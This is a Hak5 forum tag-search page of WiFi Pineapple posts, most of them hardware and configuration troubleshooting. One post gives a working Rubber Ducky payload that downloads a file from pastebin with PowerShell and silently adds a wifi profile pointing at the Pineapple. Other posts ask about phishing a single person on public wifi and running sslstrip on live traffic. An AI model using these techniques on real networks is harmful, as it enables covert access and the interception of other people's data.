Jump to content

Search the Community

Showing results for tags 'Pineapple'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. I tried updating my pineapple firmware and had a problem with the update. The update erased the html code contained within the index.php page inside of the www directory. Can anyone copy/paste their index.php page here (the one contained inside the www directory)? My web gui is blank. The only way for me to use my pineapple is through ssh, but I would like to have my web gui back :)
  2. Ive configured the 4 gb USB from the hakshop as per Darrens Specifications in the Forum guide (http://forums.hak5.org/index.php?/topic/25882-how-to-enable-usb-mass-storage-with-swap-partition/) . Its partitioned 80-20 split both are Ext4. When i plug the USB into the pineapple the USB light turns on and its visable via lsusb command. But when i SSH in and issue the mkswap /dev/sda2 command it returns root@Pineapple:~# mkswap /dev/sda2 /dev/sda2: No such file or directory i tried changing the command for sda3-5 and still nothing. Lil Help!
  3. Hi, I am having issues with getting my usb to work on my pineapple. I am trying to set up my Sandisk Cruzer Fit 32gb. I have been referring to the guide posted by Darren "How-to: Enable Usb Mass storage with swap partition". When I plug in my Sandisk Cruzer, Ubuntu's Disk Utility is able to pick up this usb. However, Ubuntu is not allowing me to proceed with any of the options "Delete Partition" or "Format Drive". The error message says "Not Authorized". I'm trying to delete the existing partition(SANDISK 34GB FAT) but it won't allow me. Is this some sort of permission issue? Do I need to run as administrator? If so please advise how to. I have attached images of the disk partition & error message. Thanks in advance for any help you can provide. Kind regards, infektiv
  4. I just bricked the POS sandisk drive from the hakshop. I want to get something with more storage space but that wont suck up a lot of pineapple juice. any suggestions?
  5. Good day my fellow pineapplers! I'm very curious about the pinenumbers feature. Why would we want anyone (even you Seb/Darren) to track usage on a device that is so easily (and dare I say commonly?) used for illegal/semi-legal things? The very nature of the pineapple is grey-hat at best. Its purpose-built to take advantage of inherent trust vulnerabilities and exploit them. This is great for pentesters, but not everyone who buys/uses a pineapple is a pentester. I know, I know, theres plenty of disclaimers about not using it for nefarious activities - which protects you guys very well. You certainly need these boilerplate statements when building/supporting this kind of device. But what protects us, the consumers? I understand you're want for usage statistics, just like any dev - you can build better future products and continue to increase functionality in a more efficient way with your current products. With this type of device, with this market you're in, with these privacy-paranoid customers that you have...it just doesn't make sense in my brain. Tell me, why would I allow that on my pineapple? My second argument is that of contactual privacy afforded to my customers. Say I use the pineapple for legal pen testing as I should, and say I am pentesting a fortune 500 company or even better, a government institution. What happens on a pen test, stays in a pen test. By contractual obligation I can only share the results of the pen test with my customers in their status reports and final report. By allowing the pineapple to send usage statistics and other metrics (even anonymous ones) to the cloud, the pineapple would break that trust I have with my customers and infringe on the contracts I've signed and get paid for. I understand theres going to be an opt-out function in the gui (and I hope cli support as well) - but I thought I'd explain myself as to why I won't be participating with some of my pineapples. My test pineapples, the one I play with at home, the one I use to rick roll my friends - I will surely leave on for your metrics. Ones that are actually used on jobs, I'm afraid I just can't, and I hope you understand. I'd love to begin a dialog about this, so please let me know your thoughts. Thanks everyone! telot
  6. So I have the pineapple the laptop and wifi. I got in the pineapple and can see the gui features. Now that where it Ends. I have no other idea of what im doing. I am a real super newb and if anyone can help me i would appreciate it. i got online from the pineapple once but then couldn't get access back in unless i switched back to my other network then after going back to pineapple i couldn't get back in. This is all exciting but very slow and frustrating. There is no one i know that is interested in this or cares about these topics so i dont know where else to go for help. I you tube and read but its mostly foreign. i need a compass so show me the way. i mean super new i have no idea about any terminal controls other then pinging.
  7. so dose any one here think that it is possible to bring the rick role from the pineapple and the fast typing of the duck and put them together so when a person trys to surf they will always see rick astley and hear his song
  8. Hello all, 2 part question. First, cant seem to get my little 4gig san disk working on the pineapple mk4. I've got it formated to Ext4 and partitioned to an 80-20 split. When i plug it in. the USB light comes on and the disk is listed in the lsusb Output tab as "Bus 001 Device 003: ID 0781:5530 SanDisk Corp. Cruzer". I did the whole "mkswap /dev/sda2" command in advanced. The problem is that when i check the resources tab the disk space hasnt done up. The one thing i havent done that the pineapple booklet says is that because im formating and partitioning with windows minipartition tool instead of linux the process was a little different. I didnt see an option uncheck the take ownership box because there didnt seem to bee one. Is this a major problem, and is this normally enabled by default? Second question is if im not concerned about battery life can i just use a toshiba external HDD thats got two Ext4 partitions to store data. I have the drive partitioned into about 4 parts. 2 of which are the 80-20 split and ext4 format. It has the same problem as the little san disk. i.e shows up in the lsusb output but doesnt acctually increase disk space. Let me know what u think the deal is. Thanks
  9. Ive got the Mark IV running 2.7 on windows 8. I have my pineapple tethered via Ethernet and sharing enabled.The problem im having is that when a device connects to an open network automatically, the pineapple receives the request and successfully associated according to the log page. with DNS spoof enabled it all looks good until the client tries to navigate the web. Two things have been happening. First is whenever the client tries to go to any site the load bar goes to about a third of the way and the page never loads regardless of whether it is a spoofed HTML site from the www folder or its just supposed to forward to the real site. Nothing works. Its like Karma is supposed to be a tool to disable internet access. But when the clients connect to the SSID broadcasted by the pineapple intentionally, ie selecting the network, everything works swimmingly as long as karma is disabled. clients have internet access and are either forwarded to their destination or the HTML page from the pineapple. The second thing thats happening is that occasionally when karma is enabled and a device connects to an open network from memory it will occasionally just switch over to the pineapple SSID. This may have something to do with the fact that the first network isnt providing internet access due to the fore mentioned problem. Let me know if you have any ideas. Thanks all.
  10. Hey all, as the topic pretty much lays out, my question is whether the /root/.ssh of the pineapple mark IV supposed to be empty? theres no known_host, or anything else. i just re-flashed and still nothing. Im also having some problems with karma and the USB so im trying to figure out if theres like some files missing, or more likely my noobness is preventing me from getting all setup. Anyone whose willing to talk me through some of this stuff will receive no money, but when you die, on your deathbed you will receive total consciousness..... which would be nice. So ya, if you know about the host thing or you wana help a brother out leave a post. Thanks. -Scanner Martel
  11. it appears to be a kickstarter for a solar powered phone/tablet recharger. is it too small/not powerful enough? or something to kick around as a possible idea http://www.kickstarter.com/projects/wakawakalight/wakawaka-power-the-best-compact-solar-power-statio
  12. I just got the Mark IV pineapple and Im ready to get the road on the show. I followed the instructions in the booklet for "Connecting for the first time" with windows Ethernet testing- I'm running windows 8- but after configuring my home WiFi (internet facing adapter) and the LAN connection (Pineapple Facing Adapter) as illustrated in the booklet I still cant connect to 172.16.42.1/pineapple in my web browser.Whenever i try i just get a php.redirect and whatever page im on just reloads. my WiFi IPv4 and DNS is set to automatically obtain (Image 1) and pineapple settings are in Image 2. What do I need to do to get into the pineapple GUI!? any help would be greatly appreciated. Any additional info you may need just let me know. Image 1 Image 2
  13. Want to buy new or used Pineapple Mark IV Send your offers to PM, cheers
  14. I'm new in all Pineapple hacking stuff, know that you can phish and give false web pages. But can it phish only specific IP, which is connected to public wifi? If there is 10 people, and I want to use phishing on one of them. Can I send pop-up, which opens automatically when user is in web browser?
  15. Well, I haven't browsed enough to know if there is an introduction forum, but I'll go ahead and say hello here in my first post. My name is John, but I go by d1sc1ple01, obviously. I am a pretty big CS fan, and I'm getting into a decent amount of programming. I had a course on python, then c++, and now I'm teaching myself php and html5 on the side. However, like most people, hacking has always been super intriguing to me. My buddy showed me how to crack some windows passwords with bt5r3 and then we both learned how to crack wep and wpa2 wifi together. Since then, i've wanted to do more but havent had the resources. For xmas, I bought a pineapple mark iv and the reaver bundle with the alfa wifi adapter. I am of the opinion that: "the only stupid question is one you don't google first." So, I have been googling and researching a lot but these questions either can't be found or are better suited for a personal response. tl;dr - Hey! I'm new! Here's some questions: 1. Do you have any advice for how to learn any of the following more quickly than just googling and reading? an understanding of linux, a broad understanding of the tools in backtrack, how to utilize the pineapple 2. I only recently became interested in these topics, so I haven't seen many hak5 episodes. Is there a list of hak5 episodes that contain information and/or tutorials about uses for the pineapple and/or a usb wifi/adapter? 3. Do you have any general advice in regards to this field of study? 4. What other forums should I be on? Thanks for any and all information.
  16. Is possible to run sslstrip on bridge interface or only over NAT ? like on pic. I want to decode https data on the fly in network between WiFi Router & ISP without accessing in local network & changing ip addresses
  17. Hi guys, I was browsing through a couple of the old payloads on the USB Rubber Ducky wiki and saw that one had been written to associate with the wifi pineapple. The method that was used went through the GUI and took too long. I decided that it must be possible to accomplish using netsh. I threw this script together (originally for my Teensy++, but I rewrote it for the ducky). It uses Mubix' powershell code to download an xml file from pastebin (that I uploaded) and then adds it to the wireless profile using netsh. The whole process takes roughly 6-7 seconds on my Teensy, would be great to hear how you guys get on with it on the ducky! Here is the code: REM Brought to you by Xcellerator DEFAULT_DELAY 200 DELAY 3000 GUI r STRING cmd MENU STRING a ENTER LEFT ENTER STRING cd %TEMP% ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml') ENTER DELAY 1000 ENTER STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection" ENTER STRING del a.xml ENTER STRING exit ENTER [/CODE] You can also find it on the wiki https://github.com/h...ion-(VERY-FAST). The Teensy Version can be found here: http://pastebin.com/c9KSdNAe
  18. *Edited 12/19/12 Ok so here's pretty much what's up with my MK4, I can NOT see any beacon requests, no devices calling for their "remembered" ap's, not even my own devices! I also cannot connect to the MK4 (Posing as a client "Oh look, unlocked Wifi") Running a Mark IV Software running 2.7.0 Connecting it VIA Ubuntu 12.10 I use the pineapple WLAN out to an Apple Airport Express , which is wirelessly connected to my router. If necessary , I occasionally connect my laptop via local ethernet on the MK4. Wireless, MK4 Karma (Which doesn't work, I see ZERO beacon requests from other devices, including my own.), AutoStart, Cron Jobs, URL Snarf, DNS Spoof Ping results : Average 1.583 ms, no higher than 1.85 Is the problem repeatable (Every time the MK4 is on): Nothing had to be done to recreate things, I just suddenly stopped seeing beacon requests. I've actually re-flashed the pineapple twice, a 100% clean slate. Basic system log *Warning, it's pretty lengthy. Sorry, just providing anything that might be useful :) 00:01:14 Pineapple user.info sysinit: sh: write error: Invalid argument 00:01:14 Pineapple user.info sysinit: sh: write error: Invalid argument 00:01:14 Pineapple user.info sysinit: setting up led WLAN 00:01:14 Pineapple user.info sysinit: setting up led WAN 00:01:14 Pineapple user.info sysinit: setting up led USB 00:01:14 Pineapple user.info sysinit: setting up led LAN 00:01:14 Pineapple user.info sysinit: Selected interface 'wlan0' 00:01:14 Pineapple user.info sysinit: OK 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:wan/mode: nonexistent directory 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:wan/device_name: nonexistent directory 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:lan/mode: nonexistent directory 00:01:14 Pineapple user.info sysinit: /etc/rc.common: eval: line 1: can't create /sys/class/leds/alfa:blue:lan/device_name: nonexistent directory 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPOFFER(br-lan) 172.16.42.234 00:26:18:69:d2:ca 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPDISCOVER(br-lan) 172.16.42.234 00:26:18:69:d2:ca 00:01:14 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 00:01:13 Pineapple kern.info kernel: [ 73.450000] br-lan: port 2(wlan0) entered forwarding state 00:01:11 Pineapple kern.info kernel: [ 71.450000] br-lan: port 2(wlan0) entered forwarding state 00:01:11 Pineapple kern.info kernel: [ 71.440000] br-lan: port 2(wlan0) entered forwarding state 00:01:11 Pineapple kern.info kernel: [ 71.360000] device wlan0 entered promiscuous mode 00:01:10 Pineapple kern.info kernel: [ 70.550000] device wlan0 left promiscuous mode 00:01:10 Pineapple kern.info kernel: [ 70.550000] br-lan: port 2(wlan0) entered disabled state 00:01:10 Pineapple daemon.info dnsmasq[1676]: using nameserver 8.8.8.8#53 00:01:10 Pineapple daemon.info dnsmasq[1676]: using nameserver 208.67.222.222#53 00:01:10 Pineapple daemon.info dnsmasq[1676]: using nameserver 208.67.220.220#53 00:01:10 Pineapple daemon.info dnsmasq[1676]: using local addresses only for domain lan 00:01:10 Pineapple daemon.info dnsmasq[1676]: using local addresses only for domain lan 00:01:10 Pineapple daemon.info dnsmasq[1676]: started, version 2.62 cachesize 150 00:01:10 Pineapple daemon.info dnsmasq[1676]: reading /tmp/resolv.conf.auto 00:01:10 Pineapple daemon.info dnsmasq[1676]: read /etc/hosts - 1 addresses 00:01:10 Pineapple daemon.info dnsmasq[1676]: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP no-DHCPv6 no-Lua TFTP no-conntrack 00:01:10 Pineapple daemon.info dnsmasq-dhcp[1676]: read /etc/ethers - 0 addresses 00:01:10 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCP, IP range 172.16.42.100 -- 172.16.42.249, lease time 12h 00:01:07 Pineapple user.notice dnsmasq: DNS rebinding protection is active, will discard upstream RFC1918 responses! 00:01:07 Pineapple user.notice dnsmasq: Allowing 127.0.0.0/8 responses 00:01:05 Pineapple user.notice ifup: Allowing Router Advertisements on wan (eth1) 00:01:04 Pineapple daemon.notice netifd: wan (1284): Sending select for 192.168.0.15... 00:01:04 Pineapple daemon.notice netifd: wan (1284): Sending discover... 00:01:04 Pineapple daemon.notice netifd: wan (1284): Lease of 192.168.0.15 obtained, lease time 86400 00:01:04 Pineapple daemon.notice netifd: Interface 'wan' is now up 00:01:04 Pineapple authpriv.info dropbear[1577]: Running in background 00:01:03 Pineapple kern.info kernel: [ 63.140000] br-lan: port 2(wlan0) entered forwarding state 00:01:03 Pineapple cron.info crond[1560]: crond: crond (busybox 1.19.4) started, log level 5 00:01:01 Pineapple kern.info kernel: [ 61.140000] br-lan: port 2(wlan0) entered forwarding state 00:01:01 Pineapple kern.info kernel: [ 61.140000] br-lan: port 2(wlan0) entered forwarding state 00:01:01 Pineapple daemon.notice netifd: wan (1284): Sending discover... 02:16:22 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 02:14:35 Pineapple kern.info kernel: [ 6764.700000] eth0: link down 02:14:35 Pineapple kern.info kernel: [ 6764.700000] br-lan: port 1(eth0) entered disabled state 02:14:01 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 02:13:27 Pineapple kern.info kernel: [ 6696.200000] br-lan: port 1(eth0) entered forwarding state 02:13:25 Pineapple kern.info kernel: [ 6694.200000] eth0: link up (1000Mbps/Full duplex) 02:13:25 Pineapple kern.info kernel: [ 6694.200000] br-lan: port 1(eth0) entered forwarding state 02:13:25 Pineapple kern.info kernel: [ 6694.200000] br-lan: port 1(eth0) entered forwarding state 02:13:25 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 02:13:25 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 02:11:43 Pineapple cron.info crond[5628]: crond: crond (busybox 1.19.4) started, log level 5 02:10:46 Pineapple cron.info crond[5509]: crond: crond (busybox 1.19.4) started, log level 5 02:10:01 Pineapple user.notice root: CLEANUP: memory looking good 02:10:01 Pineapple user.notice root: CLEANUP: Karma log looking good 02:10:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 02:10:01 Pineapple cron.info crond[1560]: crond: USER root pid 5256 cmd /pineapple/scripts/cleanup.sh 02:09:40 Pineapple kern.info kernel: [ 6469.180000] eth0: link down 02:09:40 Pineapple kern.info kernel: [ 6469.180000] br-lan: port 1(eth0) entered disabled state 02:09:07 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 02:05:28 Pineapple authpriv.info dropbear[4290]: Exit (root): Exited normally 02:05:01 Pineapple user.notice root: CLEANUP: memory below threshold, dropping pagecache, dentries and inodes 02:05:01 Pineapple user.notice root: CLEANUP: Karma log looking good 02:05:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 02:05:01 Pineapple cron.info crond[1560]: crond: USER root pid 4891 cmd /pineapple/scripts/cleanup.sh 02:00:19 Pineapple authpriv.notice dropbear[4290]: Password auth succeeded for 'root' from 172.16.42.234:34499 02:00:16 Pineapple authpriv.info dropbear[4290]: Child connection from 172.16.42.234:34499 02:00:01 Pineapple user.notice root: CLEANUP: memory looking good 02:00:01 Pineapple user.notice root: CLEANUP: Karma log looking good 02:00:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 02:00:01 Pineapple cron.info crond[1560]: crond: USER root pid 4264 cmd /pineapple/scripts/cleanup.sh 01:55:01 Pineapple user.notice root: CLEANUP: memory looking good 01:55:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:55:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:55:01 Pineapple cron.info crond[1560]: crond: USER root pid 3820 cmd /pineapple/scripts/cleanup.sh 01:54:30 Pineapple kern.info kernel: [ 5559.370000] br-lan: port 1(eth0) entered forwarding state 01:54:29 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 01:54:29 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 01:54:28 Pineapple kern.info kernel: [ 5557.370000] eth0: link up (1000Mbps/Full duplex) 01:54:28 Pineapple kern.info kernel: [ 5557.370000] br-lan: port 1(eth0) entered forwarding state 01:54:28 Pineapple kern.info kernel: [ 5557.370000] br-lan: port 1(eth0) entered forwarding state 01:54:24 Pineapple kern.info kernel: [ 5552.870000] eth0: link down 01:54:24 Pineapple kern.info kernel: [ 5552.870000] br-lan: port 1(eth0) entered disabled state 01:52:59 Pineapple authpriv.info dropbear[3497]: Exit (root): Exited normally 01:51:06 Pineapple authpriv.notice dropbear[3497]: Password auth succeeded for 'root' from 172.16.42.234:60417 01:50:55 Pineapple authpriv.info dropbear[3497]: Child connection from 172.16.42.234:60417 01:50:16 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPREQUEST(br-lan) 172.16.42.234 00:26:18:69:d2:ca 01:50:16 Pineapple daemon.info dnsmasq-dhcp[1676]: DHCPACK(br-lan) 172.16.42.234 00:26:18:69:d2:ca derek-1005HA 01:50:15 Pineapple kern.info kernel: [ 5304.660000] br-lan: port 1(eth0) entered forwarding state 01:50:13 Pineapple kern.info kernel: [ 5302.660000] eth0: link up (1000Mbps/Full duplex) 01:50:13 Pineapple kern.info kernel: [ 5302.660000] br-lan: port 1(eth0) entered forwarding state 01:50:13 Pineapple kern.info kernel: [ 5302.660000] br-lan: port 1(eth0) entered forwarding state 01:50:01 Pineapple user.notice root: CLEANUP: memory looking good 01:50:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:50:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:50:01 Pineapple cron.info crond[1560]: crond: USER root pid 3429 cmd /pineapple/scripts/cleanup.sh 01:45:01 Pineapple user.notice root: CLEANUP: memory looking good 01:45:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:45:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:45:01 Pineapple cron.info crond[1560]: crond: USER root pid 3214 cmd /pineapple/scripts/cleanup.sh 01:43:37 Pineapple daemon.warn dnsmasq-dhcp[1676]: no address range available for DHCP request via eth1 01:43:27 Pineapple kern.info kernel: [ 4896.660000] eth0: link down 01:43:27 Pineapple kern.info kernel: [ 4896.660000] br-lan: port 1(eth0) entered disabled state 01:40:01 Pineapple user.notice root: CLEANUP: memory below threshold, dropping pagecache, dentries and inodes 01:40:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:40:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:40:01 Pineapple cron.info crond[1560]: crond: USER root pid 2836 cmd /pineapple/scripts/cleanup.sh 01:39:59 Pineapple kern.info kernel: [ 4688.380000] device br-lan entered promiscuous mode 01:35:01 Pineapple user.notice root: CLEANUP: memory looking good 01:35:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:35:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:35:01 Pineapple cron.info crond[1560]: crond: USER root pid 2645 cmd /pineapple/scripts/cleanup.sh 01:30:01 Pineapple user.notice root: CLEANUP: memory looking good 01:30:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:30:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:30:01 Pineapple cron.info crond[1560]: crond: USER root pid 2528 cmd /pineapple/scripts/cleanup.sh 01:25:01 Pineapple user.notice root: CLEANUP: memory looking good 01:25:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:25:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:25:01 Pineapple cron.info crond[1560]: crond: USER root pid 2411 cmd /pineapple/scripts/cleanup.sh 01:20:01 Pineapple user.notice root: CLEANUP: memory looking good 01:20:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:20:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:20:01 Pineapple cron.info crond[1560]: crond: USER root pid 2294 cmd /pineapple/scripts/cleanup.sh 01:15:01 Pineapple user.notice root: CLEANUP: memory looking good 01:15:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:15:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:15:01 Pineapple cron.info crond[1560]: crond: USER root pid 2177 cmd /pineapple/scripts/cleanup.sh 01:10:01 Pineapple user.notice root: CLEANUP: memory looking good 01:10:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:10:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:10:01 Pineapple cron.info crond[1560]: crond: USER root pid 2060 cmd /pineapple/scripts/cleanup.sh 01:05:01 Pineapple user.notice root: CLEANUP: memory looking good 01:05:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:05:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:05:01 Pineapple cron.info crond[1560]: crond: USER root pid 1969 cmd /pineapple/scripts/cleanup.sh 01:00:01 Pineapple user.notice root: CLEANUP: memory looking good 01:00:01 Pineapple user.notice root: CLEANUP: Karma log looking good 01:00:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 01:00:01 Pineapple cron.info crond[1560]: crond: USER root pid 1957 cmd /pineapple/scripts/cleanup.sh 00:55:01 Pineapple user.notice root: CLEANUP: memory looking good 00:55:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:55:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:55:01 Pineapple cron.info crond[1560]: crond: USER root pid 1945 cmd /pineapple/scripts/cleanup.sh 00:50:01 Pineapple user.notice root: CLEANUP: memory looking good 00:50:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:50:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:50:01 Pineapple cron.info crond[1560]: crond: USER root pid 1933 cmd /pineapple/scripts/cleanup.sh 00:45:01 Pineapple user.notice root: CLEANUP: memory looking good 00:45:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:45:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:45:01 Pineapple cron.info crond[1560]: crond: USER root pid 1921 cmd /pineapple/scripts/cleanup.sh 00:40:01 Pineapple user.notice root: CLEANUP: memory looking good 00:40:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:40:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:40:01 Pineapple cron.info crond[1560]: crond: USER root pid 1909 cmd /pineapple/scripts/cleanup.sh 00:35:01 Pineapple user.notice root: CLEANUP: memory looking good 00:35:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:35:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:35:01 Pineapple cron.info crond[1560]: crond: USER root pid 1897 cmd /pineapple/scripts/cleanup.sh 00:30:01 Pineapple user.notice root: CLEANUP: memory looking good 00:30:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:30:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:30:01 Pineapple cron.info crond[1560]: crond: USER root pid 1885 cmd /pineapple/scripts/cleanup.sh 00:25:01 Pineapple user.notice root: CLEANUP: memory looking good 00:25:01 Pineapple user.notice root: CLEANUP: Karma log looking good 00:25:01 Pineapple user.notice root: CLEANUP: Clean-up Script Executed 00:25:01 Pineapple cron.info crond[1560]: crond: USER root pid 1873 cmd /pineapple/scripts/cleanup.sh 00:24:03 Pineapple user.info autossh[1317]: ssh exited with status 1; autossh exiting 00:23:53 Pineapple cron.err crond[1560]: time disparity of 22599382 minutes detected
  19. everyone keep posting about there new modules but from where can i download them ? i really want to use them with my pineapple but seems hard to download them
  20. Last night I started putting together a module that allows you control virtual machines from the pineapple control center. Let me know if this is something that interests anyone. http://youtu.be/7QQEI1Univ0?hd=1
  21. OK, so I just found a new reason to try to unbrick my Mark IV and flash it. On another hacking website they had an article about some $350 drone with a WiFi radio. Last year someone gave me one of those little drone helicopters you can fly with your smartphone. It only cost like $79 at Radio Shack (you can probably beat this deal) and it comes with a replacement plan. I'm thinking we should strap try strapping a Mk 4+battery pack on to a drone and do some "Wi-Flying". No more walking right into the lion's den looking all awkward as you clumsily try to plug-in and/or hide your strange-looking device with the antenna and all that. Just get within eyesight -- or within radio signal distance if you have a camera on your drone -- and fly it into enemy territory, capturing data all the while. If you got good with it then you could fly it up the side of a tall building and land on a windowsill, capture some packets for an hour and fly it back down! :) OK I completely realize that this probably has limited sane usefulness for us and the windowsill part may be a bit on the optimistic side, but wouldn't it be cool to help pioneer the capability? Has anyone here done it and if so is there any video, because I'd love to see it? I could totally see the FBI and CIA lurking around reading about this, then deciding to rip us off and make a $500,000 version LOL
  22. Hey guys!! Ok, so Speaking as a Pineapple no0b, I'm still learning the ways of my Mark IV. I was watching the episode where Mubix explains how to Tunnel your way out of a WiFi Hotspot with DNS (essentially not paying the fee at the hotspot and connecting to your server and bypassing it all). And he started talking about how to incorporate that with the Pineapple. Even though it was on 1st gen Pineapple, It got me thinking: how could something like that be done with the pineapple? Not sure how much could be said obviously (legality and what not) but just my curiosity brewing.
  23. I'm trying to set up my pineapple MK4 (running 2.7.0) to be able to filter certain tcp ports on a bridge interface. I am able to do this same thing on my laptop running 12.04 ubuntu between two interface cards, but I can't seem to get it to work on the MK4. I realize the below steps are not persistant on a reboot as this is only a POC I am trying to achieve. The steps I take on the MK4: - I edit /etc/sysctl.conf and reboot the MK4 (I read this in another forum and have tried it both ways (with '1' or '0' -default) net.bride.bridge-nf-call-iptables=1 - I create a new bridge and add eth1 brctl addbr br0 ifconfig eth1 0.0.0.0 promisc up brctl addif br0 eth1 - I delete the pineapple exsisitng bridge and add eth0 to the new bridge ifconfig br-lan down ifconfig eth0 down brctl delbr br-lan ifconfig eth0 0.0.0.0 promisc up brctl addif br0 eth0 - I bring up the bridge ifconfig br0 192.168.1.1 netmask 255.255.255.0 up At this point traffic goes through the bridge between eth0 and eth1 (which is good) but I want to be able to filter the forwarding traffic via iptables. - so I add this to the iptables flush them iptables -X iptables -F add filter iptables -A FORWARD -p tcp --dport 80 -j DROP but it still continues to forward port 80 (or any port I put in) I have also tried iptables -A FORWARD -j DROP and it still continues to forward everything. If I do this on INPUT or OUTPUT it does work as I expect it to. What am I missing? I understand that bridge is layer 2 while iptables are layer 3 but I have read that "bridge-nf-call" (I have no idea what I am talking about) takes care of this. Do I need to install additional iptables packages maybe? Thanks in advance for any advice you may have. magoo
  24. When I first got my pineapple I could opkg install ruby and other ruby packages just fine. Ruby "still" works... but irb and gem won't. I've looked into the fact that /usr/lib/ruby is at /usb/usr/lib/ruby ... I linked it. After that I seemed to have progress except I get a "/usb/usr/bin/ruby: can't resolve symbol 'getipnodebyname'" error. It seems that OpenWRT has a bad file in the package. One source suggests downgrading the zlib library... but the link given is bad. Another seems to indicate it's a makefile difference and a merge to an old version will fix it. Are we able to build/fix packages on the box? I really would like to use the full power of the Ruby language here. Help would be greatly appreciated!
  25. [sOLVED!] For those of you having the same problem as me, I fixed it by using the power cable that it was shipped with, rather than the USB power cable. Because I am in the UK, I had to use a shaver to mains adapter. Thanks everyone. Hey guys, me and a friend got our hands on the AP121U via ebay and were hoping to flash them with the Jasager firmware. We followed the guide to the letter and used UART cables to flash the factory binaries onto the devices. However, they enter into a boot loop after resetting them. I can hit 'f' and return to drop into failsafe mode, where we're presented with the following prompt: root@(none):/# I've tried starting dropbear to scp over the Jasager files to /tmp/, but I can't even establish a connection (yeah, I'm using the PoE port). Any ideas would be much appreciated. P.S. I thought it could have been a dodgy AP121U, but my friend's does EXACTLY the same thing as mine.
×
×
  • Create New...